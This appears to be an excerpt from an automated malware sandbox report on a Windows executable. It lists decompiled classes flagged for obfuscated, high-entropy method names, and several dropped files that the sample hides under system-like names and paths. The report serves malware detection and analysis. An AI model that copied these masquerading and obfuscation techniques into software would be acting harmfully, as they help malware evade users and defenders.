Source: OH6KO8NBy1.exe, VhEcR6JW83X3PJCGAfi.cs	High entropy of concatenated method names: '_46E', 'd65', 'zLUJudJgoQ', 'NSFkyiUSs1r', 'RJFk2plj3EX', 'EnmJvxbuQs', 'GgMgvikRDUnSjfs9bIQ0', 'hnyTB9kR6YwbdkWID5Jg', 'zU3ZH5kRQQunBBjp4Z18', 'Lab1oLkRtj0oSBaWuTKV'
Source: OH6KO8NBy1.exe, Q8dARBwU5WX5tj6M8hO.cs	High entropy of concatenated method names: 'EGZqpJ0xih', 'cOCqk0iVBY', 'P4sq8TZ3B9', 'mQF15kkcSdxlx4fCBMRK', 'oPwc4bkcdSCgC8OApUFr', 'rXhXH4kc52sx7Juq5vd8', 'j7C9YNkcmZMASIJNiMCu', 'XolwmvLAkN', 'KPOwSGiAIy', 'AkrwdgPEYf'
Source: OH6KO8NBy1.exe, UwdCVwYZfSJykuaVaZg.cs	High entropy of concatenated method names: 'akMkwVsbmsj', 'cJ4kwXssfqA', 'd7rkwOjkniH', 'bHhvNqkuOyGoRy9GnwvD', 'WqqssekuNeeVVfdu1Tvq', 'NhsSmekuIhv3eUivmYt8', 'kZ8kymIK6l4', 'cJ4kwXssfqA', 'B8LBYTku5e5D8ELGE4qx', 'pitgLgkuBbfOhJG2ej9x'
Source: OH6KO8NBy1.exe, nAHeEeJzVNNO72wuddp.cs	High entropy of concatenated method names: 'pO6owwtgQf', 'JFRPG1kRXZGnehxDqx4n', 'TRutQnkROZ9kGkLlPQ44', 'kS8PAKkRNek0pQ9fJtcf', 'J8eLhlkRIOQLEmhOCInV', 'eq7', 'd65', 'FAnk2l0kSHw', 'pWCk2h2rjD0', 'LLbkyFerv3I'
Source: OH6KO8NBy1.exe, j6jLOI7QuDGUBsCKMGO.cs	High entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'hrY7teSMmh', 'JZFoksk1aqyLLbAPJaHH', 'qc4T1Sk1R2wtjZ3w8M9f', 'efpIu5k1VT3ty6dhsHXP', 'YdADnLk1Xr5Yfv2tZxCa', 'Lsl61Dk1O8WbqpH5WZwb', 'SQpJGIk1NF5mkctw28aj'
Source: OH6KO8NBy1.exe, Qr2vJkulGbfJGi4ursy.cs	High entropy of concatenated method names: 'cIr3yIkMi0a6rM3BnU1R', 'xnPWh2kMF1peHapqB5Oj', 'mjRvvBK6KW', 'OTq3QykMagfQqAyKjYni', 'LQ87l7kMRW04ProApUqG', 'U8pRtRkMVM0TcbR9gDXj', 'xEr0GUkMXGiXY8mv0XgE', 'MuTHuSkMOyrCoNo6Wr1h', 'FZ8bJ9kMNb4CMy2uCl0k', 'ECrLgtkMIRCYWOwQ8HYp'
Source: OH6KO8NBy1.exe, BJIc5pCsFgRYC8rSQwJ.cs	High entropy of concatenated method names: 'j9l', 'SPpC4Po6df', 'HpjCa0ajvN', 'ynbCRbx12w', 'Nu9CVGXgQ2', 'MsPCXWHDN2', 'FUSCO6Foew', 'CZVUcGkOnK8ZFNmS98T0', 'RtaBlakODweH1msOgMy0', 'bTpw96kOtYur8Xs0wMP0'
Source: OH6KO8NBy1.exe, eLq8ZhHw4UBPgWtcCGo.cs	High entropy of concatenated method names: 'v0kcWhkXemuXuOoftvxm', 'TRhRWkkXLHXbhsXk9Oj7', 'k8xRVNkX9K6KI3m9yPhZ', '_7kT', '_376', 'SEMHymsG4M', 'WmRHJkTHWy', '_4p5', 'yieHoPEWlc', 'qCTHHRRDJh'
Source: OH6KO8NBy1.exe, GxMcIHFtDoF2AHQ0rsc.cs	High entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
Source: OH6KO8NBy1.exe, Es5YXhFsoNTde16jMpZ.cs	High entropy of concatenated method names: 'yiTF4lu1jS', 'AYrFalI0Zt', 'OUNFRHV8BN', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'TJHFVpJaHU'
Source: OH6KO8NBy1.exe, sUqIGoay0QdqOqVijEt.cs	High entropy of concatenated method names: 'jJ8aoSfy1k', '_64r', '_69F', '_478', 'EI5aHu1Wex', '_4D8', 'RKTa0STQpL', 'TLHaZWuCiX', '_4qr', 'DdFaCpaaRp'
Source: OH6KO8NBy1.exe, K1lPB6qKun7YxcDe9W9.cs	High entropy of concatenated method names: 'GVlqiRy9T7', 'gkWlTMk40nt3fEyvh65w', 'iFVEakk4orVEtQ8F44Qi', 'F7saKrk4Hc303swCMUxS', 'sM6FwOk4ZQcMPvBnIfk0', 'Eh3UoUk4Ce49UoKWL5bV', 'TOCqQtSw2X', 'a1e8Xdk43kDJ7vOAUnRE', 'BbWZr9k4wsJxHmatI3IK', 'g1Fdwwk4qYhXfUX6Zu3N'
Source: OH6KO8NBy1.exe, uhrbM22NLh2Y9jKsdUp.cs	High entropy of concatenated method names: 'wO92d3Z5aB', 'sjYiBukFOGIfE4Ncq0D7', 'OWmLSYkFVyNbMcow8EpJ', 'slE503kFX6C2Ewl15Fy4', 'QuO2xcWNRs', 'Vn92B6lyiW', 'e2D2UAFO2r', 'iMZSkbkF4p6Wm02q3af1', 'SerBTqkFsZl6xKUIege5', 'TTpnMHkFcWqqSk36iRcB'
Source: OH6KO8NBy1.exe, hLAIEjqc4V6AQxbGbr8.cs	High entropy of concatenated method names: 'nlAqmli2rR', 'MNqqS8LqVr', 'XYdqdxjI3T', 'fUOGuTk4nycA8cnj9UhZ', 'zZrRwTk4TPklpIVDktxx', 'NtkruHk4DG8PKf0TyGMM', 'VCaC0Vk4tlgGxwrYXywI', 'aMOqa2nx3c', 'I1aqRF2eTE', 'OtIqV8uGtb'
Source: OH6KO8NBy1.exe, mORHcOwqABYBrWWZPkc.cs	High entropy of concatenated method names: 'TdFwgd2qX3', 'X38wlGK5oG', 'yDvMjakc8eG8C5ENpHTS', 'TKIMF3kcpr0tZgSSHnA2', 'dJHFxlkckSdU6sT334Au', 'bD1weem6L6', 'hKVwPC0oGA', 'oGdartksMGrHgBQcRmpv', 'AVYLVFksu2UMnUhUeYA9', 'BncsZsksv3LNMdB1GrTZ'
Source: OH6KO8NBy1.exe, fOX3Kl8BfiCnjX4moFw.cs	High entropy of concatenated method names: 'aWV8MjjUxF', 'Jur8fBagBF', 'Yil8zxGHLg', 'BK87CykTXe7oca6PORf2', 'tXpAa0kTRAESwUkGbYSh', 'ztk06YkTV31Vao345ADr', 'S22G3gVKdY', 'TifyY4kTxgHXYou35aff', 'vSNX3ekTNfr0ucRyrDu6', 'po743KkTIGWYQDTdxX6u'
Source: OH6KO8NBy1.exe, jwwoaA7FevSJ5D8etdZ.cs	High entropy of concatenated method names: 'OHU741m1Dh', 'D0C7XXq9Vf', 'qtn7IKaebX', 't5a7xoBocI', 'hMe7BOkJsG', 'J0H7UO5jXL', 'vRK75yuySm', 'MNe7mPNce4', '_0023Nn', 'Dispose'
Source: OH6KO8NBy1.exe, sh9GfHeQRpktblJnWFR.cs	High entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
Source: OH6KO8NBy1.exe, Eya91eGoxXXnnlNABnL.cs	High entropy of concatenated method names: 'IRiG0TbE5J', 'tLTGZTafJV', 'UP1GCfGnrl', 'iaf8kGkTbj924YyOrIuF', 'ENgfHWkTWIeASBWVlAFH', 'YFySTMkT7vlExWgh091C', 'FEny3vkTYt250LerMpBI', 'Ppjo8ikT1GByh0qHJmCv', 'eLOPy8kTu2ikueZ6tgqt', 'VWClCGkTvRg2EmDeSPJw'
Source: OH6KO8NBy1.exe, McyiD7GaPwcq59vt95V.cs	High entropy of concatenated method names: 'x01GVRk18U', 'ERxGXsnA58', 'mWoGOlQaQp', 'AKxGNnfAf0', 'PSOGIHb8Yt', 'xnhGx1qeWc', 'OSmGBVYQyq', 'nCGGUJsfoQ', 'NF4G5Ejbof', 'Tu3Gmaho8y'
Source: OH6KO8NBy1.exe, CWG2i3nYrDnj0OSi3x5.cs	High entropy of concatenated method names: 'arpnW6VYtw', 'JVtn1vVRHt', 'gFXnuqeUNh', 'ssGnvSbOTP', 'oSvnMSB9M3', 'VdSnfHaFCY', 'b3ynz26FRJ', 'VwnTpAS3df', 'YTYTkgGaqT', 'FGKT8LXkTV'
Source: OH6KO8NBy1.exe, KtGLOk2Qr45g1gMa7mv.cs	High entropy of concatenated method names: 'VCy2t007vc', 'rDP2nlhtPh', 'Uw32TupKKC', 'm9j2i2OUfc', 'alxoRRkFPJWqfSj7KiFM', 'tvyBXXkF98QPG4bkntqT', 'shhdOSkFeJIMCUS91B78', 'sYyDbdkFAIGCg9CZabGl', 'F6icBEkFgP7duuF0pf0q', 'upP6fUkFljMAGLX243qj'
Source: OH6KO8NBy1.exe, HHUGBfoLLj5Pvs7hNtx.cs	High entropy of concatenated method names: '_5t1', 'd65', 'L0Hk2DSSRBI', 'UgVk2tGBYXs', 'xOioeEAqZH', 'zCAkycvYi6a', 'RJFk2plj3EX', 'voplIYkR1I39rHQiSGyd', 'fKxq7kkRuRm4LR4S0Gg7', 'YTX5WCkRv4IEwckgloAW'
Source: OH6KO8NBy1.exe, wPPp40F1gF291tGeELD.cs	High entropy of concatenated method names: '_2JN', 'A67', '_49I', 'fSbFv3XVAS', 'aiKFMMK2EN', 'kbHFf0RMcp', 'RPkFz815nI', 'sKYsp5CoLF', 'Xr5skrYsJ9', 'CpItmkkjhuDewhfM8WBp'
Source: OH6KO8NBy1.exe, SxOWr5W00uFXLabCfuQ.cs	High entropy of concatenated method names: 'VGPWCu6lMS', 'ArGWrTRnyr', 'lGjWLdXBJu', 'vaPW9vRdrW', 'sAwWeXlLmP', 'eKrWPnk3Dv', 'v89UJYkv1eOlNDuLkey9', 'blZk0akvuRQFHA0rPLMp', 'CXIeUVkvvCdQ5rpNHXDM', 'ASWPWnkvMU4IFiEXBc9o'
Source: OH6KO8NBy1.exe, NaZkwMnoUXyqwwZRSfi.cs	High entropy of concatenated method names: 'Wq8n0tPLCl', 'KaYnZo8t83', 'TfUnCMUGKM', 'TNrXu3km3LOTNCdWsENM', 'vOj3NLkmGZZXgb5oKKW4', 'tVoPpDkm2OtSQogI170D', 'N0qqM6kmwsmCS6QsE6Lv', 'WBcS7mkmqb4LhnQ6CuS8', 'OrfGKQkmy712HGAh2wJh'
Source: OH6KO8NBy1.exe, CiRMKUFpP5Z7v8dDZGE.cs	High entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
Source: OH6KO8NBy1.exe, yBY00RkNiRRLray4gWb.cs	High entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'FpekyeQeGfX', 'HY1kGjqsMBO', 'qdjHlKknCEEyRBINuaKw', 'wIZF6aknrJRqrAfGj1d4', 'BAeDYCknLDisjPPTC2SO'
Source: OH6KO8NBy1.exe, xClD6S4SPgW8TQ2Jr5v.cs	High entropy of concatenated method names: '_25r', 'h65', 'Ge64j0lMXR', 'g4Q47TR8nj', 'YbU4Yl742I', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
Source: OH6KO8NBy1.exe, etoBl6ERj78SeSsVjOq.cs	High entropy of concatenated method names: 'cf7tQkMMXf', 'AsZtDky2oq', 'u2Tn5Kk5TMJtem3SE1ea', 'WJdB8wk5tSMSYK7iPZUI', 'u4sb6Ok5njSC7UGCCQDt', 'h5QEdWk5iEiQZY3HccW7', 'Xgbts4Uhct', 'CQOTxhk54d0UmYyg5j5L', 'y8ZFU1k5ssUnekYPFyw9', 'rrekHFk5cOprdlLKeIIc'
Source: OH6KO8NBy1.exe, abm5dEiGBaM8NyZn4KT.cs	High entropy of concatenated method names: 'NwEi3bPSEi', 'xaQiwvdUWk', '_7Bm', 'B1ZiqFY0KG', 'zNQiyBFcV7', 'MJuiJAs0a3', 'kHGioJEXUl', 'Np2D4gkSx4y5h9SiGEwX', 'qweZaZkSB9BTifnis9ys', 'Xgfk2OkSULpM34DE2AO0'
Source: OH6KO8NBy1.exe, xHMBjSoJq38xvTMBGal.cs	High entropy of concatenated method names: 'UNloCwNnji', 'FKZ7YdkR7EgRGLZJIRAo', 'KVDbBAkRdy8Ck9Xl3VTD', 'vSvC8JkRjhMYxe5ICds6', 'mroZaTkRYStudcjpvQsv', 'b5Sww0kRbTXmuCi9GudJ', '_53Y', 'd65', 'GhAk2Kn4Dph', 'PR5k26ofBQx'
Source: OH6KO8NBy1.exe, A5pwfYbf4XgyOYxdJ6L.cs	High entropy of concatenated method names: 'rycW8KStTa', 'lBIWGQxi3D', 'tP4XSgkvxA6SiR6LcVO2', 'gPVTO5kvBjaEsDoa9JjN', 'qTZDYSkvN3YLLpZILETV', 'SWyEoxkvIpwecWIVwfbN', 'Rl8pSakvUieN3xJIsIsP', 'GflWONkv5dtENEBKxZZk', 'nwJWp836jp', 'soXG0JkvRJSn3o7KTGCJ'
Source: OH6KO8NBy1.exe, BWLwy5qWYubE42Px2D8.cs	High entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'Snl0cIk4Xt1vRSFo4mCC', 'w8wCB4k4OhIICa08KmS5', 'hWRv9ok4NbGFS8i6n1xy', 'TQm760k4IrJefiSMYD8c'
Source: OH6KO8NBy1.exe, mhQqAL9EBpxBqJGo6E0.cs	High entropy of concatenated method names: 'kgc95m3Zi3', 'I0I96DeWMG', 'sIo9Q3XROy', 'XD19DM0oYk', 'sRi9tEb7HR', 'mn79nsdmQB', 'gTa9Tm143q', 'iLh9i2U3If', 'lbv9FYm4BB', 'Hxt9spTeux'
Source: OH6KO8NBy1.exe, a9PE5WRE9xrARfrPalW.cs	High entropy of concatenated method names: '_0023wjg', 'Dispose', '_0023Trg', 'MoveNext', '_0023Zvw', 'get_Current', '_0023Wrg', 'Reset', '_0023Xrg', 'get_Current'
Source: OH6KO8NBy1.exe, BeNFHgCrZNSspLG2KNU.cs	High entropy of concatenated method names: 'XBfC9rpJNo', 'SiqCeBoWJh', 'NYQCP8ySCc', 'DrGvDHkOh1NCDxHFpoa5', 't4SWPMkOgKwyIIH7wZuf', 'wyAJYekOlcy6rBWty7o5', 'XoKBvakOEN6S54HvBt4Y', 'WIKnPIkOKdK5GQBYPfN2', 'T04IU0kO68tJ7AyktsRL'
Source: OH6KO8NBy1.exe, ppUjAxiU9Njow2oOIX9.cs	High entropy of concatenated method names: 'AEm', 'by1', 'KG0imDlAMP', 'uM7', '_197', 'rZu', 'Q1J', '_24u', 'U67', 'xj7'
Source: OH6KO8NBy1.exe, fvElIZ3mw2XT4qS18HS.cs	High entropy of concatenated method names: 'MQp3vWVM0v', 'KcK3MSmYdS', 'J5hopAksaKNEflCvZE1m', 'MKR6A7kscENgRjHx2Uaf', 'NgfOtbks470VD61UYfLw', 'albFMQksRvoSu5cV78vQ', 'b5gwkA3Fec', 'AGyZh5ksNiBZcpJ6cjGh', 'c7179vksXOkr2pPR53m9', 'raAMxQksOUdCfwQ1BGNg'
Source: OH6KO8NBy1.exe, GaviKWj7ZralkGFucoG.cs	High entropy of concatenated method names: 'wMbky5gZEBZ', 'Ckojb2w356', 'Q0vjWQ9pJ1', 'UcIj1cJhmP', 'lvwOINkWVT4vXgKntTy1', 'WT99cHkWXTZtFYoXZ2mk', 'lSeSHJkWO6rtd8RcPQb6', 'XijEdIkWN1Gr5LPYaY5O', 'G0dQmkkWI7yo0CerTJoJ', 'BN75kmkWx4su9gGGScVK'
Source: OH6KO8NBy1.exe, UIsIJDGWeWaypY2axBZ.cs	High entropy of concatenated method names: 'JVGGuC6avl', 'eZSnt1kiV1k0Y8rbUV8N', 'u8Zdp4kiXLG7uvH2UpVs', 'slOy8ikiOvFX08qiCRmT', 'eXJCyHkiNAvI3yUh7IeP', 'TcQZdckiaw2gT4dcNsKg', 'PggYE3kiR9x6raB2tFEF'
Source: OH6KO8NBy1.exe, SlLs2JqHlBXN0cf56Hf.cs	High entropy of concatenated method names: 'zNjqZdqgDq', 'YdYqCSCxqu', 'CbDqrJwZxQ', 'pVhefFkcvd5idR7kKkje', 'ChkXB2kcMSnR1Qv9emoI', 'EOPTbqkcfA8lGJExOoNY', 'aGWFX4kczFQ5Ap6kMbOG', 'jiK6gUk4pSOnPv1GJ8jV'
Source: OH6KO8NBy1.exe, e1RmYyY2DIJC3nRnLSu.cs	High entropy of concatenated method names: 'cgkYw014si', 'wdXYqCZmOL', 'R7fYystxwR', 'eVuYJNyrCb', '_0023Nn', 'Dispose', 'vr78eNkukELSOwVuXIGm', 'skpamxku8bK5JoctVB7n', 'mT3XOXkuGUrYnx62dPM1', 'UqN4Nuku2Xl2IyAmJUnZ'
Source: OH6KO8NBy1.exe, SIaDYtZBRQ7pqpEESFK.cs	High entropy of concatenated method names: 'zMvZ5edhWN', 'DQHZm143dw', 'LSbZSiENCE', 'TK3ZdPTM5M', 'M5oZjn4VVC', 'COM7RVkO29B4BNZibxOH', 'eEhnQ4kO80ysxqZd3kTY', 'dXDNN5kOGRNJDKAnnOBm', 'KCBhKrkO34vteeaXpkgO', 'qD8xEokOwg0ahw0tQdxx'
Source: OH6KO8NBy1.exe, O8IRanMhFUERYs4psDF.cs	High entropy of concatenated method names: 'rGLMcxaI4e', 'mVRM4wGnuE', 'ThnMaDunlu', 'MCMMRs3gMI', 'bT1MVlYCAi', 'ftlMXT79KK', 'QIBMOibo7T', 'n2vMN7jD3e', 'mgoMIKqA3D', 'n70MxbW3LS'
Source: OH6KO8NBy1.exe, UdT46Wd7Z5V2rKtRJeb.cs	High entropy of concatenated method names: 'AyudbDBE04', 'CkudWmOs7b', 'Xyld1V6yys', 'JVWduN9OO6', 'PDndvQuRpi', 'TEPdMhAeZF', 'ejMdf9egcI', 'woudzZo6K2', 'RCVjpH0vSv', 'abyjkh7yv9'
Source: OH6KO8NBy1.exe, Bm7cHek105oAiFrOLkG.cs	High entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'cE4kyAKkBxp', 'HY1kGjqsMBO', 'UqJQ0pknDuqpnC3y3aTd', 'UQPv8hknt30HQR4ubrOZ', 'hH0MH8knnmyNFU8iKZAg'
Source: OH6KO8NBy1.exe, zJZEXjySSIsZb6lI4D9.cs	High entropy of concatenated method names: 'O8hyW5LfYW', 'hEEy1ek9GG', 'P9myuWby9t', 'namyvC12eq', 'iclyMaYCvc', 's2jyfZ6CfI', 'oT3yzrScOF', 'wg4U8ukaTGhmw4BndmjC', 'NWIU3qkat8tnkbcr0Tap', 'LdVt5MkanbLBUuWAjdlC'
Source: OH6KO8NBy1.exe, w4Rh9T8iGcCfGTxqqlB.cs	High entropy of concatenated method names: 'QBD8Ny8tpl', 'qUp4X2kTe7I91Maud0MU', 'YEhEgkkTPdugAAydX3Ss', 'kSfmglkTAIdT2R8ZNiLW', 'gT1ZUbkTgTCfJvGyeeX4', 'Vf1QUqkTlEk0fsD7ypff', 'olS8sjb5rJ', 'JgT8cTej0t', 'xxH84UnDeU', 'urW8aSekKe'
Source: OH6KO8NBy1.exe, KFyh7i32JRlE78nagrw.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'O323whvWVy', 'NGR3qdhEO8', 'jgx3ypr6gN', 'wcDYIMkF7VBs2LOOJsGv', 'rEqsaYkFYQNHfC5mlRPj', 'OP8aZAkFbviM5LHSa4Tx', 'cDfW4rkFWPv35jQJ1wFu', 'D7FHkAkF1WcvOgGPbILn'
Source: OH6KO8NBy1.exe, W1qbCtoXdCEqkNwqP7j.cs	High entropy of concatenated method names: '_2SY', 'JAvkyRp6aXv', 'KB4oN3rkZn', 'bEMkyVki5eT', 'Gr06XukVKxrxWIT308jX', 'lEpw0qkVhF0T0koyYBnZ', 'yfmKYPkVEm2ViLqJ5FhS', 'NLRCILkV6pxJgVEGuqO5', 'EZHj9akVQU4Kkv54IdgB', 'vqUvwVkVDIvxkygQGBv4'
Source: OH6KO8NBy1.exe, yXc9xTkDaOWaSaiLAOY.cs	High entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'aTUkyLnuyWT', 'HY1kGjqsMBO', 'TAd8DMktW9FftdQ05mjG', 'CCaE6qkt1BR0T60NSkgS', 'fudeHLktu5x4U9s9Cbia'
Source: OH6KO8NBy1.exe, l26juAHiEXBwvKqpSCZ.cs	High entropy of concatenated method names: 'BjbZArJtup', 'iGBj1CkXmoVJFLuoNV9H', 'O3h3pmkXU2XVbiDITob9', 'dPdnlGkX55ivjPnI7VAx', 'vCIZTIkXSXOfEYdws37E', 'e7FHsZUp8x', 'd47HcdoHaT', 'jDuH4jCog2', 'sNcHapXo8c', 'WC2HR2aBRx'
Source: OH6KO8NBy1.exe, jyrVLy3Z2imgPxywK9e.cs	High entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'nO6kylHpIFU', 'AgikGzNCMK9', 'Cg16k2ks8XYy9VDYgdw5', 'KjcR2yksGDuU4AvpXP9U', 'cg7EJsks2T4WIBnZ0D2Q', 'wtJ0Ukks3iw2EQmrOutb', 'a8hp64kswEmPQpYchyNq'
Source: OH6KO8NBy1.exe, bJeJaqcEDpnNxATInDg.cs	High entropy of concatenated method names: 'v1O4Lb8qt9', 'idY7eGkj16g75i3STUkd', 'g4LDGYkjuJoYA2LdN6sq', 'GRlPT2kjvfuNVouuJsxb', 'i5X', 'EtVc6a1VEB', 'W93', 'L67', '_2PR', 'p6J'
Source: OH6KO8NBy1.exe, yimSUtocdTMZdKd81Ih.cs	High entropy of concatenated method names: 'Yi3', 'uwqky40mLkm', 'lgsoaLNSQT', 'VlgkyaUkPuO', 'xqThAokV9NOQdbNCXcFO', 'oHffaCkVeFLcW1QKmDmJ', 'ylKAWukVrHMNYJtAe8BF', 'X9uDcBkVLUK7wJEHFsio', 'CXHD5HkVPUfSjvrBvQUO', 'ERtU1gkVAS7UwnrPgJOB'
Source: OH6KO8NBy1.exe, thJmf8G9pfGt1wnVJmY.cs	High entropy of concatenated method names: 'dF5GnN4u9K', 'KjsGTMmQTu', 'Kf9GiWVthK', 'xjh2unkirNIQWNk1BveL', 'SLrjvSkiZB304eU0BXt2', 'i6rACOkiCajnaJL0DTgp', 'ntBFwrkiLWB4pN4xjCU1', 'vvGG6Ssp54', 'fiUGQ79qNR', 'zS4qVqkioBSaJYlsrNkx'
Source: OH6KO8NBy1.exe, jN6GT5e8kfd4FTJRnJc.cs	High entropy of concatenated method names: 'wdceetwty5', 'NLyeAFxRhv', 'sv6e2dMQoj', 'hlge3wWkXG', 'JBpewPP0gF', 'yCfeqqoKM4', 'M0Seyx8eMa', 'VPAeJkUJXv', 'onueogI9Ac', 'T2ReHHC9ix'
Source: OH6KO8NBy1.exe, bmWJCmnGmJi2g1h4uU9.cs	High entropy of concatenated method names: 'vKin3THyfv', 'EyNnwIrSiY', 'v4SnqVnRHF', 'VQmnyYQRZb', 'jf6nJsGJSk', 'wbkT3ck5vAuhWAbB3l5j', 'dDvDY6k51USZC76cj2Pd', 'F5CbOvk5uoKlByOmvhy2', 'zmxUJqk5MQFRhdN0NCbL', 'ppRcxnk5fcnWmZ6Y8dLm'
Source: OH6KO8NBy1.exe, pDPQKAVPQdLebvFxeLx.cs	High entropy of concatenated method names: 'r0OVgerxL2', 'wNUVlHuLKa', 'QHQVhhJ28r', 'EZOVErwvnR', 'f7ZVKeA71s', 'GZoV6SGwtp', 'DQkVQZFFra', 'TP0VDiS3Mr', 'R2tVtxCstA', 'e5OVnjHkmB'
Source: OH6KO8NBy1.exe, t58gH1LzSC4162RXVQU.cs	High entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'eys9kTCDhj', 'zVk98Lb9KI', 'gY2', 'rV4', '_28E'
Source: OH6KO8NBy1.exe, Xhfh6t8k6AEm3HiTQxh.cs	High entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'kiZkygcknm6', 'HY1kGjqsMBO', 'msaCkeknaKiTcACkV5Sc', 'nrqhGtknRqx8RnQyRso3', 'PbNAh4knVQ3RFPYHCF2m'
Source: OH6KO8NBy1.exe, gvLAEU3EcG337IeIPWx.cs	High entropy of concatenated method names: 'lZh3aHesDX', 'kcp3RDgGY2', 'b9Wbr1ksEI9Cdx7GHcWd', 'ANkLv2ksKE4WBuGpsYHG', 'Ow736iDVp0', 'RmK3QPxl6F', 'uqW3DIlpvv', 'ynL3tpF5Ef', 'Wib3nHoTTu', 'K3T3TI818g'
Source: OH6KO8NBy1.exe, FBmtbAueepP1Y0u626M.cs	High entropy of concatenated method names: 'irS835UmASP', 'wtyrGckMEdrcvHxthSl5', 'hGCNPYkMKHeN2yBV9jNH', 'oWYLfhkM6O55Z01qXWFR', 'IIDA0EkMQVoqs9J8mMnt'
Source: OH6KO8NBy1.exe, BoBUuSebhyUJRedHPla.cs	High entropy of concatenated method names: 'YBaCL7kBOCEAN6Jd7EMJ', 'wLfI2GkBViOWbjaienSd', 'hjAb2TkBXw4AYWlbKOcq', 'LQN6FikBNuG1Zgb0R8Rg', 'MWDEQivN5a', 'CEcDZakBUlXtpj6nPlrr', 'q4bMoHkBx8fJRyS5oauL', 'FYcU2gkBBFOWwWuAjZuW', 'DtqBwqkB5aPEyhWFKhUV', 'bAwIEqkBmmRf9OP5TSME'
Source: OH6KO8NBy1.exe, AvoTdUrfxxyY7sd61mu.cs	High entropy of concatenated method names: 'iiDLp37miX', 'Sb5LkNHuY9', 'pSgL8PdIFY', 'vBALGdwiXi', 'qKxL2N3qef', 'UtUK3SkNqwaUFAbGmqQs', 'gt0iyQkNyMsptHruG0dF', 'xrPnmCkNJVq9llP4Xb42', 'cHTguEkNoEqJAwDbuwha', 'HF5lH1kNHRuYILaT28DR'
Source: OH6KO8NBy1.exe, dWjKsOZieIqqsU4xFwU.cs	High entropy of concatenated method names: 'L2l', 'Jo5', '_2EF', 'i4P', '_6c7', '_77i', '_38r', '_142', 'Xhv', 'eT3'
Source: OH6KO8NBy1.exe, pnHVjbCYmD4kSpDeZb6.cs	High entropy of concatenated method names: 'tvVCW7yI3Y', 'rtrC1McxtT', 'wLUCuULKyj', 'fqDCvMDjep', 'uZ8CM6Lwxf', 'KU4QmIkOxy4Bvbr6i1dM', 'Dq5vwpkONbtgkKZxehYL', 'LCK72KkOIVCc4ea3fSqm', 'nCyBTTkOB5YX9VJVTlgY', 'K8I1GRkOUFxeLJXDf3Ge'
Source: OH6KO8NBy1.exe, tFJ2ZYrARmC53dqdM0b.cs	High entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'upKrlKhJaw', '_947', 'tXGrh6p9iM', 'eoFrEsOZtx', '_1f8', '_71D'
Source: OH6KO8NBy1.exe, cwhXhM8yhd1X7huhsEL.cs	High entropy of concatenated method names: 'Huy8oQvOAD', 'Kg48H8pcV4', 'bHb80gMFjw', 'a4VOhBknUT56eN6JQIV0', 'bufCONkn5HnBbeLsV72o', 'XyEKOgknm1LDAqwvyO2C', 'fKXOKmknSeqd9HqMtlcT', 'e8S8dUkndHfDTqh0BaqC', 'PZcPGdknjLbBpEGOAW8K', 'vQvML6kn78qgQb1FKlIg'
Source: OH6KO8NBy1.exe, jIVF2XjuUTSTbjVWYVy.cs	High entropy of concatenated method names: 'IdX70mOabb', 'XEE2tbk1e1KhHrTqUlkE', 'kKeXHOk1P3Xg6bXyJGkW', 'IRNJtdk1LC6C1Wdah7TF', 'Nfn3O5k190CQRbqMR2dy', 'EZGe8pk1AhdtPjgFTxEB', 'CPX', 'h7V', 'G6s', '_2r8'
Source: OH6KO8NBy1.exe, UAhFZSiV04MSVPQJUpr.cs	High entropy of concatenated method names: 'ngPiOOkI53', 'XdNiNN5suu', 'wSOiIES5D0', 'G9bixBKpAL', 'RqEiBgkuEQ', 'VxquKckdQ6fGLMvgDEnT', 'cReZ0mkdDvp1qVwJbjsp', 'VJWTlYkdKeAGiusYZbVl', 'EGqIFhkd6N1wNsoUF0W5', 'd4xKQXkdtZWhYvYs82Yl'
Source: OH6KO8NBy1.exe, uFG2SYJF7LoJcbj3jVP.cs	High entropy of concatenated method names: 'mPGJNmhZUj', 'ooBFtUkRHHnsGiePnMY3', 'w3cu7ekRJ79vQtnEjP9M', 'msAWSVkRooluTdvHS93K', 'etW08JkR0jjHBe35hFXM', 'j1PvNYkRZoXD5OqEaAJk', 'UU8', 'd65', 'ufOk2CBbX0E', 'K8bk2rwEn2C'
Source: OH6KO8NBy1.exe, IFkZCCGSvkwuD5n9KJt.cs	High entropy of concatenated method names: 'K6XGYQKmhm', 'RWydSckistDB6yL8Qia4', 'w1kUbBkiiQ6rdbBUX1BG', 'Kscr8ukiFHZkB8uJ13HB', 'hjGCxlkictbytl9KL0o7', 'ISyGj6VcZA', 'WkrMlbkiDTedHWjgUSCN', 'CqXoyrkitRyJj3uShyO6', 's3wrEcki6bdvOv3JicST', 'BLvWpvkiQjQhvD66RpTu'

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	File created: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	File created: C:\Recovery\UserOOBEBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	File created: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	File created: C:\Program Files\Windows NT\TableTextService\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Jump to dropped file
